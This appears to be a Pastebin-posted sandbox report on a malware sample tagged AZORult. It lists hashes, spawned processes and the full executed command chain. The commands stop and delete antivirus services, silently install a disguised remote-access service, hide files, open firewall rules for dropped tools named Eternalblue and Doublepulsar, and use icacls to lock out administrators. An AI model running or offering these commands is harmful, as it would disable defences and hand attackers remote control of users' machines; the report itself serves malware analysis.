paladin316

Exes_a83fb348f3b803d1dd92946e8dcf0e8c_rar_2019-08-12_11_30.txt

Aug 12th, 2019
3,486
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 150.11 KB | None | 0 0
  1. * MalFamily: "AZORult"
  2.  
  3. * MalScore: 10.0
  4.  
  5. * File Name: "Exes_a83fb348f3b803d1dd92946e8dcf0e8c.rar"
  6. * File Size: 11405312
  7. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  8. * SHA256: "5bd2d341093fe91785282b2b35a685981135148a749f59cf6744f228acd8f561"
  9. * MD5: "a83fb348f3b803d1dd92946e8dcf0e8c"
  10. * SHA1: "3c58e579607ccd9f7e8896c55b67b9c1117b3d2c"
  11. * SHA512: "5b9e69b826284e70fdbe9a0e0fb9668aa0b1769bf17c984ffed78ed2bca18427a1f33ec4f7d31c87987d0f8318f7d3d42248d56bb7de7cf4bf05085ae211430f"
  12. * CRC32: "6A1E8155"
  13. * SSDEEP: "196608:zjTlZxXmNzSnU4A3mNmIV0vDjTX91Lkdi71wbFZ4/2DkUpQP49IEzASAB2HCNw:zdZxXYzhmEIAL9BeiUFZoc52PMIfSlx"
  14.  
  15. * Process Execution:
  16. "Exes_a83fb348f3b803d1dd92946e8dcf0e8c.rar",
  17. "wini.exe",
  18. "wscript.exe",
  19. "cmd.exe",
  20. "regedit.exe",
  21. "regedit.exe",
  22. "timeout.exe",
  23. "rutserv.exe",
  24. "rutserv.exe",
  25. "rutserv.exe",
  26. "attrib.exe",
  27. "attrib.exe",
  28. "sc.exe",
  29. "sc.exe",
  30. "sc.exe",
  31. "winit.exe",
  32. "cmd.exe",
  33. "timeout.exe",
  34. "zeta.exe",
  35. "taskhostw.exe",
  36. "cmd.exe",
  37. "timeout.exe",
  38. "cheat.exe",
  39. "taskhost.exe",
  40. "taskhostw.exe",
  41. "winlogon.exe",
  42. "cmd.exe",
  43. "schtasks.exe",
  44. "cmd.exe",
  45. "schtasks.exe",
  46. "cmd.exe",
  47. "schtasks.exe",
  48. "cmd.exe",
  49. "schtasks.exe",
  50. "cmd.exe",
  51. "schtasks.exe",
  52. "cmd.exe",
  53. "schtasks.exe",
  54. "cmd.exe",
  55. "schtasks.exe",
  56. "cmd.exe",
  57. "schtasks.exe",
  58. "cmd.exe",
  59. "ipconfig.exe",
  60. "cmd.exe",
  61. "scaner.exe",
  62. "audiodg.exe",
  63. "R8.exe",
  64. "wscript.exe",
  65. "cmd.exe",
  66. "taskkill.exe",
  67. "taskkill.exe",
  68. "timeout.exe",
  69. "chcp.com",
  70. "Rar.exe",
  71. "cmd.exe",
  72. "sc.exe",
  73. "cmd.exe",
  74. "sc.exe",
  75. "cmd.exe",
  76. "sc.exe",
  77. "cmd.exe",
  78. "sc.exe",
  79. "cmd.exe",
  80. "sc.exe",
  81. "cmd.exe",
  82. "sc.exe",
  83. "cmd.exe",
  84. "sc.exe",
  85. "cmd.exe",
  86. "sc.exe",
  87. "cmd.exe",
  88. "sc.exe",
  89. "cmd.exe",
  90. "sc.exe",
  91. "cmd.exe",
  92. "sc.exe",
  93. "cmd.exe",
  94. "sc.exe",
  95. "cmd.exe",
  96. "sc.exe",
  97. "cmd.exe",
  98. "sc.exe",
  99. "cmd.exe",
  100. "sc.exe",
  101. "cmd.exe",
  102. "sc.exe",
  103. "cmd.exe",
  104. "sc.exe",
  105. "cmd.exe",
  106. "sc.exe",
  107. "cmd.exe",
  108. "sc.exe",
  109. "cmd.exe",
  110. "netsh.exe",
  111. "cmd.exe",
  112. "netsh.exe",
  113. "cmd.exe",
  114. "netsh.exe",
  115. "cmd.exe",
  116. "netsh.exe",
  117. "cmd.exe",
  118. "netsh.exe",
  119. "cmd.exe",
  120. "netsh.exe",
  121. "cmd.exe",
  122. "netsh.exe",
  123. "cmd.exe",
  124. "netsh.exe",
  125. "cmd.exe",
  126. "netsh.exe",
  127. "cmd.exe",
  128. "netsh.exe",
  129. "cmd.exe",
  130. "netsh.exe",
  131. "cmd.exe",
  132. "netsh.exe",
  133. "cmd.exe",
  134. "netsh.exe",
  135. "cmd.exe",
  136. "netsh.exe",
  137. "cmd.exe",
  138. "netsh.exe",
  139. "cmd.exe",
  140. "netsh.exe",
  141. "cmd.exe",
  142. "netsh.exe",
  143. "cmd.exe",
  144. "netsh.exe",
  145. "cmd.exe",
  146. "netsh.exe",
  147. "cmd.exe",
  148. "netsh.exe",
  149. "cmd.exe",
  150. "netsh.exe",
  151. "cmd.exe",
  152. "netsh.exe",
  153. "cmd.exe",
  154. "netsh.exe",
  155. "cmd.exe",
  156. "netsh.exe",
  157. "cmd.exe",
  158. "netsh.exe",
  159. "cmd.exe",
  160. "netsh.exe",
  161. "cmd.exe",
  162. "netsh.exe",
  163. "cmd.exe",
  164. "netsh.exe",
  165. "cmd.exe",
  166. "netsh.exe",
  167. "cmd.exe",
  168. "netsh.exe",
  169. "cmd.exe",
  170. "netsh.exe",
  171. "cmd.exe",
  172. "netsh.exe",
  173. "cmd.exe",
  174. "netsh.exe",
  175. "cmd.exe",
  176. "netsh.exe",
  177. "cmd.exe",
  178. "netsh.exe",
  179. "cmd.exe",
  180. "netsh.exe",
  181. "cmd.exe",
  182. "netsh.exe",
  183. "cmd.exe",
  184. "netsh.exe",
  185. "cmd.exe",
  186. "netsh.exe",
  187. "cmd.exe",
  188. "netsh.exe",
  189. "cmd.exe",
  190. "netsh.exe",
  191. "cmd.exe",
  192. "netsh.exe",
  193. "cmd.exe",
  194. "netsh.exe",
  195. "cmd.exe",
  196. "netsh.exe",
  197. "cmd.exe",
  198. "netsh.exe",
  199. "cmd.exe",
  200. "netsh.exe",
  201. "cmd.exe",
  202. "netsh.exe",
  203. "cmd.exe",
  204. "netsh.exe",
  205. "cmd.exe",
  206. "netsh.exe",
  207. "cmd.exe",
  208. "netsh.exe",
  209. "cmd.exe",
  210. "netsh.exe",
  211. "cmd.exe",
  212. "netsh.exe",
  213. "cmd.exe",
  214. "netsh.exe",
  215. "cmd.exe",
  216. "netsh.exe",
  217. "cmd.exe",
  218. "netsh.exe",
  219. "cmd.exe",
  220. "netsh.exe",
  221. "cmd.exe",
  222. "netsh.exe",
  223. "cmd.exe",
  224. "netsh.exe",
  225. "cmd.exe",
  226. "netsh.exe",
  227. "cmd.exe",
  228. "icacls.exe",
  229. "cmd.exe",
  230. "icacls.exe",
  231. "cmd.exe",
  232. "icacls.exe",
  233. "cmd.exe",
  234. "icacls.exe",
  235. "cmd.exe",
  236. "cmd.exe",
  237. "cmd.exe",
  238. "cmd.exe",
  239. "sc.exe",
  240. "services.exe",
  241. "svchost.exe",
  242. "WmiPrvSE.exe",
  243. "svchost.exe",
  244. "svchost.exe",
  245. "lsass.exe",
  246. "svchost.exe",
  247. "rutserv.exe",
  248. "rfusclient.exe",
  249. "rfusclient.exe",
  250. "rfusclient.exe",
  251. "spoolsv.exe",
  252. "svchost.exe",
  253. "svchost.exe",
  254. "svchost.exe",
  255. "appidpolicyconverter.exe",
  256. "taskhost.exe",
  257. "appidcertstorecheck.exe",
  258. "WMIADAP.exe"
  259.  
  260.  
  261. * Executed Commands:
  262. "\"C:\\Windows\\system32\\rundll32.exe\" \"C:\\Windows\\syswow64\\WININET.dll\",DispatchAPICall 1",
  263. "C:\\ProgramData\\Microsoft\\Intel\\wini.exe -pnaxui",
  264. "C:\\ProgramData\\install\\zeta.exe",
  265. "C:\\programdata\\install\\cheat.exe -pnaxui",
  266. "C:\\Windows\\system32\\cmd.exe /c sc delete swprv",
  267. "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\ProgramData\\Windows\\install.vbs\"",
  268. "C:\\ProgramData\\Windows\\install.vbs ",
  269. "C:\\ProgramData\\Windows\\winit.exe ",
  270. "C:\\ProgramData\\Install\\taskhostw.exe",
  271. "C:\\Windows\\System32\\cmd.exe /c C:\\Windows\\system32\\timeout.exe 3 & del \"taskhostw.exe\"",
  272. "\"C:\\Programdata\\Windows\\install.bat\"",
  273. "C:\\Programdata\\Windows\\install.bat ",
  274. "C:\\Programdata\\Install\\del.bat",
  275. "C:\\ProgramData\\Microsoft\\Intel\\taskhost.exe ",
  276. "sc delete swprv",
  277. "regedit /s \"reg1.reg\"",
  278. "regedit /s \"reg2.reg\"",
  279. "timeout 2",
  280. "rutserv.exe /silentinstall",
  281. "rutserv.exe /firewall",
  282. "rutserv.exe /start",
  283. "C:\\Windows\\system32\\attrib.exe ATTRIB +H +S C:\\Programdata\\Windows\\*.*",
  284. "C:\\Windows\\system32\\attrib.exe ATTRIB +H +S C:\\Programdata\\Windows",
  285. "sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000",
  286. "sc config RManService obj= LocalSystem type= interact type= own",
  287. "sc config RManService DisplayName= \"Microsoft Framework\"",
  288. "C:\\Programdata\\RealtekHD\\taskhostw.exe",
  289. "C:\\programdata\\microsoft\\intel\\R8.exe",
  290. "C:\\Windows\\system32\\cmd.exe /c sc start appidsvc",
  291. "C:\\Windows\\system32\\cmd.exe /c sc start appmgmt",
  292. "C:\\Windows\\system32\\cmd.exe /c sc config appidsvc start= auto",
  293. "C:\\Windows\\system32\\cmd.exe /c sc config appmgmt start= auto",
  294. "C:\\Windows\\system32\\cmd.exe /c sc stop mbamservice",
  295. "C:\\Windows\\system32\\cmd.exe /c sc stop bytefenceservice",
  296. "C:\\Windows\\system32\\cmd.exe /c sc delete bytefenceservice",
  297. "C:\\Windows\\system32\\cmd.exe /c sc delete mbamservice",
  298. "C:\\Windows\\system32\\cmd.exe /c sc delete crmsvc",
  299. "C:\\Windows\\system32\\cmd.exe /c sc delete \"windows node\"",
  300. "C:\\Windows\\system32\\cmd.exe /c sc stop Adobeflashplayer",
  301. "C:\\Windows\\system32\\cmd.exe /c sc delete AdobeFlashPlayer",
  302. "C:\\Windows\\system32\\cmd.exe /c sc stop MoonTitle",
  303. "C:\\Windows\\system32\\cmd.exe /c sc delete MoonTitle\"",
  304. "C:\\Windows\\system32\\cmd.exe /c sc stop clr_optimization_v4.0.30318_64",
  305. "C:\\Windows\\system32\\cmd.exe /c sc delete clr_optimization_v4.0.30318_64\"",
  306. "C:\\Windows\\system32\\cmd.exe /c sc stop MicrosoftMysql",
  307. "C:\\Windows\\system32\\cmd.exe /c sc delete MicrosoftMysql",
  308. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall set allprofiles state on",
  309. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"Port Blocking\" protocol=TCP localport=445 action=block dir=IN",
  310. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"Port Blocking\" protocol=UDP localport=445 action=block dir=IN",
  311. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"Port Block\" protocol=TCP localport=139 action=block dir=IN",
  312. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"Port Block\" protocol=UDP localport=139 action=block dir=IN",
  313. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"Recovery Service\" dir=in action=allow program=\"C:\\ProgramData\\WindowsTask\\MicrosoftHost.exe\" enable=yes",
  314. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"Shadow Service\" dir=in action=allow program=\"C:\\ProgramData\\WindowsTask\\AppModule.exe\" enable=yes",
  315. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"Security Service\" dir=in action=allow program=\"C:\\ProgramData\\WindowsTask\\AMD.exe\" enable=yes",
  316. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"Recovery Services\" dir=out action=allow program=\"C:\\ProgramData\\WindowsTask\\MicrosoftHost.exe\" enable=yes",
  317. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"Shadow Services\" dir=out action=allow program=\"C:\\ProgramData\\WindowsTask\\AppModule.exe\" enable=yes",
  318. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"Security Services\" dir=out action=allow program=\"C:\\ProgramData\\WindowsTask\\AMD.exe\" enable=yes",
  319. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"Survile Service\" dir=in action=allow program=\"C:\\ProgramData\\RealtekHD\\taskhostw.exe\" enable=yes",
  320. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"System Service\" dir=in action=allow program=\"C:\\ProgramData\\windows\\rutserv.exe\" enable=yes",
  321. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"Shell Service\" dir=in action=allow program=\"C:\\ProgramData\\rundll\\system.exe\" enable=yes",
  322. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"Script Service\" dir=in action=allow program=\"C:\\ProgramData\\rundll\\rundll.exe\" enable=yes",
  323. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"Micro Service\" dir=in action=allow program=\"C:\\ProgramData\\rundll\\Doublepulsar-1.3.1.exe\" enable=yes",
  324. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"Small Service\" dir=in action=allow program=\"C:\\ProgramData\\rundll\\Eternalblue-2.2.0.exe\" enable=yes",
  325. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"AllowPort1\" protocol=TCP localport=9494 action=allow dir=IN",
  326. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"AllowPort2\" protocol=TCP localport=9393 action=allow dir=IN",
  327. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"AllowPort3\" protocol=TCP localport=9494 action=allow dir=out",
  328. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"AllowPort4\" protocol=TCP localport=9393 action=allow dir=out",
  329. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP1\" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.255",
  330. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP2\" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.255",
  331. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP3\" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.255",
  332. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP4\" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.255",
  333. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP5\" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.255",
  334. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP6\" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.255",
  335. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP7\" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.255",
  336. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP8\" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.255",
  337. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP9\" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.255",
  338. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP10\" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.248",
  339. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP11\" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.255",
  340. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP12\" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.255",
  341. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP13\" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.255",
  342. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP14\" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.255",
  343. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP15\" protocol=TCP action=block dir=IN remoteip=172.104.56.113",
  344. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP16\" protocol=TCP action=block dir=OUT remoteip=172.104.56.113",
  345. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP17\" protocol=TCP action=block dir=IN remoteip=178.128.101.72",
  346. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP18\" protocol=TCP action=block dir=out remoteip=178.128.101.72",
  347. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP19\" protocol=TCP action=block dir=IN remoteip=210.108.146.96",
  348. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP20\" protocol=TCP action=block dir=out remoteip=210.108.146.96",
  349. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP21\" protocol=TCP action=block dir=IN remoteip=176.57.70.81",
  350. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP22\" protocol=TCP action=block dir=out remoteip=176.57.70.81",
  351. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP23\" protocol=TCP action=block dir=IN remoteip=61.130.8.22",
  352. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP24\" protocol=TCP action=block dir=out remoteip=61.130.8.22",
  353. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP25\" protocol=TCP action=block dir=IN remoteip=134.209.181.186",
  354. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP26\" protocol=TCP action=block dir=out remoteip=134.209.181.186",
  355. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP27\" protocol=TCP action=block dir=IN remoteip=134.209.188.169",
  356. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP28\" protocol=TCP action=block dir=out remoteip=134.209.188.169",
  357. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP29\" protocol=TCP action=block dir=IN remoteip=165.22.143.11",
  358. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP30\" protocol=TCP action=block dir=out remoteip=165.22.143.11",
  359. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP31\" protocol=TCP action=block dir=IN remoteip=157.230.120.236",
  360. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP32\" protocol=TCP action=block dir=out remoteip=157.230.120.236",
  361. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP31\" protocol=TCP action=block dir=IN remoteip=156.67.216.61",
  362. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP32\" protocol=TCP action=block dir=out remoteip=156.67.216.61",
  363. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP31\" protocol=TCP action=block dir=IN remoteip=165.22.23.102",
  364. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP32\" protocol=TCP action=block dir=out remoteip=165.22.23.102",
  365. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP31\" protocol=TCP action=block dir=IN remoteip=178.128.74.151",
  366. "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP32\" protocol=TCP action=block dir=out remoteip=178.128.74.151",
  367. "C:\\Windows\\system32\\cmd.exe /c icacls \"\"C:\\WINDOWS\\inf\\lsmm.exe\" /deny \\xd0\\x90\\xd0\\xb4\\xd0\\xbc\\xd0\\xb8\\xd0\\xbd\\xd0\\xb8\\xd1\\x81\\xd1\\x82\\xd1\\x80\\xd0\\xb0\\xd1\\x82\\xd0\\xbe\\xd1\\x80\\xd1\\x8b:(OI)(CI)(F)",
  368. "C:\\Windows\\system32\\cmd.exe /c icacls \"\"C:\\WINDOWS\\inf\\lsmm.exe\" /deny system:(OI)(CI)(F)",
  369. "C:\\Windows\\system32\\cmd.exe /c icacls \"\"C:\\WINDOWS\\inf\\lsmm.exe\" /deny Administrators:(OI)(CI)(F)",
  370. "C:\\Windows\\system32\\cmd.exe /c icacls \"\"C:\\WINDOWS\\inf\\msief.exe\" /deny \\xd0\\x90\\xd0\\xb4\\xd0\\xbc\\xd0\\xb8\\xd0\\xbd\\xd0\\xb8\\xd1\\x81\\xd1\\x82\\xd1\\x80\\xd0\\xb0\\xd1\\x82\\xd0\\xbe\\xd1\\x80\\xd1\\x8b:(OI)(CI)(F)",
  371. "C:\\Windows\\system32\\cmd.exe /c icacls \"\"C:\\WINDOWS\\inf\\msief.exe\" /deny system:(OI)(CI)(F)",
  372. "C:\\Windows\\system32\\cmd.exe /c icacls \"\"C:\\WINDOWS\\inf\\msief.exe\" /deny Administrators:(OI)(CI)(F)",
  373. "C:\\Windows\\system32\\cmd.exe /c icacls \"C:\\Windows\\NetworkDistribution\" /deny \\xd0\\x90\\xd0\\xb4\\xd0\\xbc\\xd0\\xb8\\xd0\\xbd\\xd0\\xb8\\xd1\\x81\\xd1\\x82\\xd1\\x80\\xd0\\xb0\\xd1\\x82\\xd0\\xbe\\xd1\\x80\\xd1\\x8b:(OI)(CI)(F)",
  374. "C:\\Windows\\system32\\cmd.exe /c icacls \"C:\\Windows\\NetworkDistribution\" /deny Administrators:(OI)(CI)(F)",
  375. "C:\\Programdata\\WindowsTask\\winlogon.exe",
  376. "C:\\Windows\\system32\\cmd.exe /c ipconfig /flushdns",
  377. "C:\\Windows\\system32\\cmd.exe /c gpupdate /force",
  378. "\"C:\\Windows\\system32\\rundll32.exe\" \"C:\\Windows\\system32\\WININET.dll\",DispatchAPICall 1",
  379. "C:\\Programdata\\WindowsTask\\scaner.exe -pnaxui",
  380. "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\rdp\\run.vbs\"",
  381. "C:\\rdp\\run.vbs ",
  382. "sc start appidsvc",
  383. "sc start appmgmt",
  384. "sc config appidsvc start= auto",
  385. "sc config appmgmt start= auto",
  386. "\"C:\\rdp\\pause.bat\"",
  387. "pause.bat ",
  388. "C:\\Windows\\system32\\svchost.exe -k LocalServiceAndNoImpersonation",
  389. "C:\\Windows\\system32\\svchost.exe -k netsvcs",
  390. "C:\\Windows\\system32\\lsass.exe",
  391. "C:\\Windows\\system32\\svchost.exe -k NetworkServiceNetworkRestricted",
  392. "C:\\ProgramData\\Windows\\rutserv.exe",
  393. "C:\\Windows\\System32\\spoolsv.exe",
  394. "C:\\Windows\\System32\\svchost.exe -k netsvcs",
  395. "C:\\Windows\\system32\\appidpolicyconverter.exe",
  396. "C:\\Windows\\system32\\appidcertstorecheck.exe",
  397. "sc stop mbamservice",
  398. "sc stop bytefenceservice",
  399. "taskkill /f /im Rar.exe",
  400. "timeout 3",
  401. "chcp 1251",
  402. "\"Rar.exe\" e -p555 db.rar",
  403. "sc delete bytefenceservice",
  404. "sc delete mbamservice",
  405. "sc delete crmsvc",
  406. "sc delete \"windows node\"",
  407. "sc stop Adobeflashplayer",
  408. "sc delete AdobeFlashPlayer",
  409. "sc stop MoonTitle",
  410. "sc delete MoonTitle\"",
  411. "sc stop clr_optimization_v4.0.30318_64",
  412. "sc delete clr_optimization_v4.0.30318_64\"",
  413. "sc stop MicrosoftMysql",
  414. "sc delete MicrosoftMysql",
  415. "netsh advfirewall set allprofiles state on",
  416. "netsh advfirewall firewall add rule name=\"Port Blocking\" protocol=TCP localport=445 action=block dir=IN",
  417. "netsh advfirewall firewall add rule name=\"Port Blocking\" protocol=UDP localport=445 action=block dir=IN",
  418. "netsh advfirewall firewall add rule name=\"Port Block\" protocol=TCP localport=139 action=block dir=IN",
  419. "timeout 5",
  420. "netsh advfirewall firewall add rule name=\"Port Block\" protocol=UDP localport=139 action=block dir=IN",
  421. "netsh advfirewall firewall add rule name=\"Recovery Service\" dir=in action=allow program=\"C:\\ProgramData\\WindowsTask\\MicrosoftHost.exe\" enable=yes",
  422. "netsh advfirewall firewall add rule name=\"Shadow Service\" dir=in action=allow program=\"C:\\ProgramData\\WindowsTask\\AppModule.exe\" enable=yes",
  423. "netsh advfirewall firewall add rule name=\"Security Service\" dir=in action=allow program=\"C:\\ProgramData\\WindowsTask\\AMD.exe\" enable=yes",
  424. "netsh advfirewall firewall add rule name=\"Recovery Services\" dir=out action=allow program=\"C:\\ProgramData\\WindowsTask\\MicrosoftHost.exe\" enable=yes",
  425. "netsh advfirewall firewall add rule name=\"Shadow Services\" dir=out action=allow program=\"C:\\ProgramData\\WindowsTask\\AppModule.exe\" enable=yes",
  426. "netsh advfirewall firewall add rule name=\"Security Services\" dir=out action=allow program=\"C:\\ProgramData\\WindowsTask\\AMD.exe\" enable=yes",
  427. "netsh advfirewall firewall add rule name=\"Survile Service\" dir=in action=allow program=\"C:\\ProgramData\\RealtekHD\\taskhostw.exe\" enable=yes",
  428. "netsh advfirewall firewall add rule name=\"System Service\" dir=in action=allow program=\"C:\\ProgramData\\windows\\rutserv.exe\" enable=yes",
  429. "netsh advfirewall firewall add rule name=\"Shell Service\" dir=in action=allow program=\"C:\\ProgramData\\rundll\\system.exe\" enable=yes",
  430. "netsh advfirewall firewall add rule name=\"Script Service\" dir=in action=allow program=\"C:\\ProgramData\\rundll\\rundll.exe\" enable=yes",
  431. "netsh advfirewall firewall add rule name=\"Micro Service\" dir=in action=allow program=\"C:\\ProgramData\\rundll\\Doublepulsar-1.3.1.exe\" enable=yes",
  432. "netsh advfirewall firewall add rule name=\"Small Service\" dir=in action=allow program=\"C:\\ProgramData\\rundll\\Eternalblue-2.2.0.exe\" enable=yes",
  433. "netsh advfirewall firewall add rule name=\"AllowPort1\" protocol=TCP localport=9494 action=allow dir=IN",
  434. "netsh advfirewall firewall add rule name=\"AllowPort2\" protocol=TCP localport=9393 action=allow dir=IN",
  435. "netsh advfirewall firewall add rule name=\"AllowPort3\" protocol=TCP localport=9494 action=allow dir=out",
  436. "netsh advfirewall firewall add rule name=\"AllowPort4\" protocol=TCP localport=9393 action=allow dir=out",
  437. "netsh advfirewall firewall add rule name=\"HTTP1\" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.255",
  438. "netsh advfirewall firewall add rule name=\"HTTP2\" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.255",
  439. "netsh advfirewall firewall add rule name=\"HTTP3\" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.255",
  440. "netsh advfirewall firewall add rule name=\"HTTP4\" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.255",
  441. "netsh advfirewall firewall add rule name=\"HTTP5\" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.255",
  442. "C:\\ProgramData\\Windows\\rfusclient.exe",
  443. "C:\\ProgramData\\Windows\\rfusclient.exe /tray",
  444. "netsh advfirewall firewall add rule name=\"HTTP6\" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.255",
  445. "netsh advfirewall firewall add rule name=\"HTTP7\" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.255",
  446. "netsh advfirewall firewall add rule name=\"HTTP8\" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.255",
  447. "netsh advfirewall firewall add rule name=\"HTTP9\" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.255",
  448. "netsh advfirewall firewall add rule name=\"HTTP10\" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.248",
  449. "C:\\Windows\\system32\\cmd.exe /C schtasks /query /fo list",
  450. "C:\\Windows\\system32\\cmd.exe /C schtasks /Delete /TN \"Adobe Acrobat Update Task\" /F",
  451. "C:\\Windows\\system32\\cmd.exe /C schtasks /Delete /TN \"Adobe Flash Player NPAPI Notifier\" /F",
  452. "C:\\Windows\\system32\\cmd.exe /C schtasks /Delete /TN \"GoogleUpdateTaskMachineCore\" /F",
  453. "C:\\Windows\\system32\\cmd.exe /C schtasks /Delete /TN \"GoogleUpdateTaskMachineUA\" /F",
  454. "C:\\Windows\\system32\\cmd.exe /C schtasks /Delete /TN \"OfficeSoftwareProtectionPlatform\\SvcRestartTask\" /F",
  455. "netsh advfirewall firewall add rule name=\"HTTP11\" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.255",
  456. "ipconfig /flushdns",
  457. "netsh advfirewall firewall add rule name=\"HTTP12\" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.255",
  458. "schtasks /query /fo list",
  459. "netsh advfirewall firewall add rule name=\"HTTP13\" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.255",
  460. "C:\\Windows\\system32\\timeout.exe 3",
  461. "netsh advfirewall firewall add rule name=\"HTTP14\" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.255",
  462. "netsh advfirewall firewall add rule name=\"HTTP15\" protocol=TCP action=block dir=IN remoteip=172.104.56.113",
  463. "netsh advfirewall firewall add rule name=\"HTTP16\" protocol=TCP action=block dir=OUT remoteip=172.104.56.113",
  464. "netsh advfirewall firewall add rule name=\"HTTP17\" protocol=TCP action=block dir=IN remoteip=178.128.101.72",
